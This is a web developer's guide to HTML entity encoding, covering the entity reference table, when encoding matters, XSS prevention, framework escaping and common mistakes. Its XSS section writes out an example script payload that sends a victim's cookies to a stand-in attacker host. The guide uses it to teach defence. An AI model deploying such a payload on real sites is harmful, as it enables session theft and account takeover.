HTML Entities Encoding Guide: Protect Your Web Pages
If you've ever tried to display a <div> tag as text on a web page and watched it vanish into the DOM instead, you already know the problem. Browsers treat certain characters as markup instructions, not content. HTML entities are how you tell the browser: "display this character literally, don't interpret it."
This guide covers the entities you'll actually use, when encoding matters, and how to avoid the security holes that come from skipping it.
Why HTML Entities Exist
HTML uses a handful of characters as structural delimiters. The big three:
- < opens a tag
- > closes a tag
- & starts an entity reference
When the browser's parser hits <script>, it doesn't display the text; it executes JavaScript. When it hits &copy;, it renders ©. This dual-purpose nature means that if you want to display these characters as visible text, you need to escape them using HTML entities.
An HTML entity is a string that starts with & and ends with ;. Between those delimiters is either a named reference (like amp) or a numeric code point (like #38).
Common HTML Entities Reference
Here are the entities you'll reach for most often:
| Character | Named Entity | Numeric Entity | Description |
|---|---|---|---|
| & | &amp; | &#38; | Ampersand |
| < | &lt; | &#60; | Less than |
| > | &gt; | &#62; | Greater than |
| " | &quot; | &#34; | Double quote |
| ' | &apos; | &#39; | Single quote (apostrophe) |
| (space) | &nbsp; | &#160; | Non-breaking space |
| © | &copy; | &#169; | Copyright |
| — | &mdash; | &#8212; | Em dash |
| … | &hellip; | &#8230; | Ellipsis |
| € | &euro; | &#8364; | Euro sign |
| ™ | &trade; | &#8482; | Trademark |
The first five are mandatory to know. If you're rendering any user-generated content or displaying code, you'll use &amp;, &lt;, &gt;, &quot;, and &#39; constantly.
Non-Breaking Space: The Subtle One
&nbsp; prevents a line break between two words. It's not just "an extra space": browsers collapse multiple regular spaces into one, but &nbsp; always renders. Use it for:
- Keeping units with numbers: 100&nbsp;km
- Preventing orphan words at the end of paragraphs
- Formatting prices: $&nbsp;99.99
Don't use &nbsp; for layout spacing. That's what CSS margin and padding are for.
Named vs Numeric vs Hex Entities
There are three ways to write the same entity:
<!-- Named entity -->
&amp;
<!-- Decimal numeric entity -->
&#38;
<!-- Hexadecimal numeric entity -->
&#x26;
All three produce the ampersand character &. Here's when to use each:
Named entities (&amp;, &lt;, &copy;) are readable and self-documenting. When someone reads your HTML source, &amp; immediately communicates intent. Use these for common characters.
Decimal numeric entities (&#38;, &#169;) work for any Unicode code point, even characters without named references. Use these when you need characters that don't have named entities, or when generating HTML programmatically.
Hex entities (&#x26;, &#xA9;) are the same as decimal but use hexadecimal notation. Useful when you're working with Unicode tables (which list code points in hex) or when your tools output hex values.
In practice, stick with named entities for the common ones and fall back to numeric for everything else. Named entities are supported across all browsers and are far easier to read in source code.
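The decimal and hex forms can be derived mechanically from a character's code point. A minimal sketch, assuming a hypothetical helper named numericEntities (not part of any library):

```javascript
// Hypothetical helper: build the decimal and hex references for one character.
function numericEntities(char) {
  // codePointAt returns the full code point, including characters beyond U+FFFF.
  const codePoint = char.codePointAt(0);
  return {
    decimal: `&#${codePoint};`,
    hex: `&#x${codePoint.toString(16).toUpperCase()};`,
  };
}

console.log(numericEntities('&'));      // { decimal: '&#38;', hex: '&#x26;' }
console.log(numericEntities('\u00A9')); // { decimal: '&#169;', hex: '&#xA9;' }
```

Both forms decode to the same character, so the choice between them is purely about which is easier to read next to your other tooling.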
When to Encode HTML Characters
Displaying Code Snippets
If your page shows code examples, every < and > needs encoding:
<!-- This breaks -->
<p>Use the <div> tag for containers.</p>
<!-- This works -->
<p>Use the &lt;div&gt; tag for containers.</p>
Most template engines and frameworks handle this automatically when you use their standard output syntax (e.g., {{ variable }} in templating languages or {variable} in JSX). But when you're writing raw HTML or injecting content with innerHTML, you're on your own.
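To illustrate what "handled automatically" means, here is a rough sketch of the idea behind auto-escaping output syntax, written as a JavaScript tagged template. The names encodeHTML and safeHtml are illustrative assumptions, not any framework's actual API:

```javascript
// Escape the five characters that matter in HTML text and quoted attributes.
function encodeHTML(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hypothetical tagged template: literal parts pass through untouched,
// interpolated values are escaped before being joined in.
function safeHtml(strings, ...values) {
  return strings.reduce(
    (out, literal, i) =>
      out + literal + (i < values.length ? encodeHTML(values[i]) : ''),
    ''
  );
}

const tagName = '<div>';
console.log(safeHtml`<p>Use the ${tagName} tag for containers.</p>`);
// <p>Use the &lt;div&gt; tag for containers.</p>
```

The markup you write by hand is trusted; only the interpolated values are treated as data. That is the same split template engines make between template source and variables.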
User-Generated Content
Any content that comes from users (form inputs, comments, profile fields, search queries) must be encoded before rendering. This is a security requirement, not optional.
HTML Emails
Email clients are notoriously inconsistent with character rendering. Encoding special characters as entities helps them display consistently across Gmail, Outlook, Apple Mail, and other clients. This is especially important for characters like &, ", and non-ASCII symbols.
Content Management Systems
If you're building a CMS or working with one, the content pipeline should encode HTML entities at the output stage. Content stored in the database might be raw, but what hits the browser must be escaped.
XSS Prevention: Why Encoding Is a Security Issue
Failing to encode user input before rendering it in HTML is one of the most common causes of Cross-Site Scripting (XSS) vulnerabilities. This isn't a theoretical risk: XSS has long featured in the OWASP Top 10 (as its own category through 2017, and under Injection since 2021) and is actively exploited.
How XSS Works
Consider a search page that displays what the user searched for:
<!-- Server renders this -->
<p>You searched for: USER_INPUT</p>
If a user enters normal text like javascript tutorials, no problem. But what if they enter:
<script>document.location='https://evil.com/steal?cookie='+document.cookie</script>
Without encoding, the browser sees a real <script> tag and executes it. The attacker now has any of the victim's cookies that JavaScript can read (those not flagged HttpOnly), which may include session tokens and lead to full account access.
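As a rough illustration, the vulnerable server code often amounts to plain string concatenation. The function name renderSearchResultUnsafe is hypothetical, and the function is unsafe on purpose:

```javascript
// Hypothetical render function: inserts user input into HTML with no encoding.
// Deliberately vulnerable, for illustration only.
function renderSearchResultUnsafe(userInput) {
  return `<p>You searched for: ${userInput}</p>`;
}

const payload =
  "<script>document.location='https://evil.com/steal?cookie='+document.cookie</script>";

console.log(renderSearchResultUnsafe('javascript tutorials'));
// <p>You searched for: javascript tutorials</p>

// The payload reaches the page as live markup, not as text.
console.log(renderSearchResultUnsafe(payload));
```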
The Fix
Encode the five critical characters before inserting any untrusted data into HTML:
| Character | Entity | Why It Matters |
|---|---|---|
| & | &amp; | Prevents entity injection |
| < | &lt; | Prevents tag injection |
| > | &gt; | Prevents closing of injected tags |
| " | &quot; | Prevents attribute breakout |
| ' | &#39; | Prevents attribute breakout (single-quoted) |
Here's a minimal encoding function:
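function encodeHTML(str) {
  // String() lets numbers and other non-string values pass through safely.
  return String(str)
    .replace(/&/g, '&amp;') // must run first
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}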
Note the order: & must be replaced first. If you replace < first (producing &lt;), then replace & (turning &lt; into &amp;lt;), you get double-encoding.
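The effect of replacement order is easy to see side by side. In this sketch both function names are made up for the comparison, and each handles only three characters to keep the difference obvious:

```javascript
// Correct order: the ampersand is replaced before anything that produces one.
function encodeAmpersandFirst(str) {
  return String(str)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Deliberately wrong order, for comparison only: the ampersand pass runs last
// and re-encodes the "&" that the earlier passes just produced.
function encodeAmpersandLast(str) {
  return String(str)
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/&/g, '&amp;');
}

console.log(encodeAmpersandFirst('a < b')); // a &lt; b
console.log(encodeAmpersandLast('a < b'));  // a &amp;lt; b
```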
Encoding alone doesn't cover all XSS contexts. If you're inserting user data into JavaScript, CSS, or URL attributes, you need context-specific encoding. HTML entity encoding only protects HTML body and attribute contexts.
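As one example of context-specific encoding, a value placed in a URL query string needs percent-encoding first, and the finished URL still needs HTML encoding when it goes into an attribute. A minimal sketch, assuming a hypothetical searchLink helper and a /search?q= route that is not from this guide:

```javascript
function encodeHTML(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hypothetical helper: the same untrusted value lands in two contexts.
function searchLink(query) {
  // URL context: percent-encode the value inside the query string.
  const href = '/search?q=' + encodeURIComponent(query);
  // HTML contexts: entity-encode both the attribute value and the link text.
  return `<a href="${encodeHTML(href)}">${encodeHTML(query)}</a>`;
}

console.log(searchLink('fish & "chips"'));
// <a href="/search?q=fish%20%26%20%22chips%22">fish &amp; &quot;chips&quot;</a>
```

encodeURIComponent leaves the apostrophe untouched, which is one reason the HTML encoding step on the attribute is still worth keeping.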
Framework-Level Protection
Modern frameworks handle encoding by default:
- React: JSX automatically escapes values in {} expressions. Using dangerouslySetInnerHTML bypasses this; avoid it with user content.
- Angular: Template interpolation escapes values automatically. [innerHTML] bindings are sanitized rather than escaped, and the bypassSecurityTrust* methods switch that sanitization off.
- Vue: Mustache syntax {{ }} auto-escapes. v-html does not.
- Server-side templates (EJS, Jinja2, Twig): Most auto-escape by default, but check your configuration.
The pattern is consistent: the standard path is safe, and there's always an escape hatch for raw HTML. Never pass user input through the escape hatch.
Encode HTML with Our Tool
Need to quickly encode or decode HTML entities? Our HTML Encoder tool handles it instantly:
- Paste your text and get encoded output in one click
- Supports all named and numeric entities
- Decode entities back to readable text
- Everything processes client-side, so your data never leaves your browser
It's particularly useful for preparing content for HTML emails, encoding code snippets for documentation, or sanitizing text before embedding it in templates.
Common Mistakes to Avoid
Double encoding: Running text through an encoder twice turns & into &amp;amp;. If you see &amp; showing up as literal text on your page, you've double-encoded somewhere in your pipeline.
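A quick sketch of how this happens when two pipeline stages (say, one on save and one on output) each apply the same encoder. The two-stage setup is an assumption made for illustration:

```javascript
function encodeHTML(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

const raw = 'Tom & Jerry';
const encodedOnSave = encodeHTML(raw);             // first stage
const encodedOnOutput = encodeHTML(encodedOnSave); // second stage, same encoder

console.log(encodedOnSave);   // Tom &amp; Jerry     (browser shows: Tom & Jerry)
console.log(encodedOnOutput); // Tom &amp;amp; Jerry (browser shows: Tom &amp; Jerry)
```

Encoding is not idempotent, which is why it helps to pick exactly one stage (usually output) and encode only there.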
Encoding inside <script> tags: HTML entity encoding doesn't work inside script blocks. The JavaScript parser doesn't understand &lt;; it sees it as the literal string &lt;. For inline scripts, use JavaScript string escaping instead.
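One common way to do that is to serialize the value with JSON.stringify and additionally escape <, so the data cannot close the script block. This is a sketch under the assumption that the value is JSON-serializable; toScriptLiteral is a hypothetical name:

```javascript
// Hypothetical helper: produce a JavaScript literal that is safe to embed
// inside an inline <script> block. Assumes the value is JSON-serializable.
function toScriptLiteral(value) {
  return JSON.stringify(value)
    // "\u003c" is the JavaScript escape for "<"; the parsed string is unchanged,
    // but the HTML parser never sees a literal "</script>".
    .replace(/</g, '\\u003c');
}

const comment = '</script><script>alert(1)</script>';
const literal = toScriptLiteral(comment);

console.log(`<script>const comment = ${literal};</script>`);
// <script>const comment = "\u003c/script>\u003cscript>alert(1)\u003c/script>";</script>
```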
Using &nbsp; for spacing: This creates accessibility issues. Screen readers may pronounce each non-breaking space individually. Use CSS for visual spacing.
Forgetting attribute values: Encoding isn't just for text content. Attribute values need encoding too, especially if they contain user input:
<!-- Dangerous -->
<input value="USER_INPUT">
<!-- Safe -->
<input value="&quot;encoded&quot; value">
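To see why the quote characters matter here, consider an input that tries to close the attribute and add an event handler. A minimal sketch with a hypothetical renderInput helper:

```javascript
function encodeHTML(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hypothetical helper: always quote the attribute and encode its value.
function renderInput(value) {
  return `<input value="${encodeHTML(value)}">`;
}

// Without encoding, this input would end the value and inject an onfocus handler.
console.log(renderInput('" onfocus="alert(1)'));
// <input value="&quot; onfocus=&quot;alert(1)">
```

The encoding only protects quoted attributes; an unquoted attribute can be broken out of with a plain space.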
Quick Reference: Encoding Decision Tree
- Is the content user-generated? → Always encode
- Are you displaying code? → Encode <, >, and &
- Is it going in an HTML attribute? → Encode " and ' too
- Is it going in a URL? → Use URL encoding instead (see our URL Encoding Guide)
- Is it going in JavaScript? → Use JavaScript escaping, not HTML entities
Related Resources
- Base64 Encoding Explained: understand another essential encoding format for web development
- URL Encoding Guide: learn when and how to percent-encode characters in URLs
- HTML Encoder Tool: encode and decode HTML entities instantly in your browser